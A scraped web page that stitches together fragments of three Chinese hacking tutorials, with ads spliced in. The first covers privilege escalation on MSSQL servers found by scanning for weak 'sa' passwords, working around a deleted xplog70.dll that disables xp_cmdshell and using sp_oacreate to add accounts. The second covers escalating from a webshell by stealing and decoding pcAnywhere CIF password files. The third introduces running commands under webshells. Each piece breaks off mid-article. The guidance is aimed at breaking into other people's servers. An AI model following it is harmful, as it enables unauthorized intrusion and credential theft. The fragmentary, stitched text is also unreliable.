1433提权详解!!! 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/0010261434.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上

传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

对服务器进行提权的方法

对服务器进行提权的方法 文章录入:责任编辑: 84 【字体:小大】 现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。 首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。 下面我们就进入主题,对webshell的提权方法! 首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。 在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起: 的提权方法 pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere 密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。

浅谈在WEBSHELL下如何运行命令

浅谈在WEBSHELL下如何运行命令 Author: kyo327 EMail: humour327@https://www.doczj.com/doc/0010261434.html, Date: 2010-06-16 Thanks: 互联网 [ 目录 ] 0×00 前言 0×01 在asp环境下运行命令的方法 0×02在aspx环境下运行命令的方法 0×03在php环境下运行命令的方法 0×04 在jsp 环境下运行命令的方法 0×05 其他脚本环境下运行命令的方法 0×06 后记 0×00 前言 随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S 结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的活力。但是这样就会导致越来越多的WEB安全问题的出现,比如sql注入、XSS、上传漏洞、弱口令、目录遍历等,虽然早在数十年前就被发现这些漏洞产生的根本原因,可它们却始终都没有退出历史的舞台,依然是WEB应用程序主要的安全问题,其实这也不是安全厂商和企业不重视安全,也许是恶意入侵者又从他们的安全解决方案里找到新的漏洞、也许是配合其他的漏洞形成一个不是漏洞的漏洞、也许是服务器配置方面出现了问题、也许是出于对用户的信任(因为不是所有的用户都是循规蹈矩的)、再或许是由新增加应用导致的。总之还是一句话,安全是一个整体。

*************************************************************** 这里插播个广告,黑友们请无视,只是为朋友的网站能被搜索引擎收录,多加点流量。 https://www.doczj.com/doc/0010261434.html, 返利网,淘你喜欢,淘宝返利,淘宝返现购物。 *************************************************************** 在当前这个时代,靠一个远程溢出直接获得一个SHELL对于一般的黑客来说是过于奢侈了,就算真的有传说中的80端口溢出,也要看目标值不值得用。所以一般来说大多数黑客还是从WEB应用入手。不论用什么方法吧,先拿到一个WEBSHELL是最基本的,哪怕仅仅是同C类网段的一台机器,起码可以试试ARP嗅探。而拿到一个WEBSHELL后,面临最多的一个问题就是提升权限。特别是在遇到虚拟主机的时候,当你的目标在另外一个目录,你没有办法进目标网站,仅仅是靠旁注进了同一服务器的其他站点,这种情况提权跨目录成了必经之路。但是要提升权限基本上都是要执行命令的,现在的大多数WEB服务器、虚拟主机等都做了安全设置,因此本文就谈一谈在各种脚本语言环境下都有哪些方法可以执行命令。(本文仅探讨服务器为windows的情况) 0×01 在asp环境下运行命令的方法 当拿到一个asp的WEBSHELL时,想运行命令,一般是先查看一下组件支持情况。如图1

相关主题
文本预览
相关文档 最新文档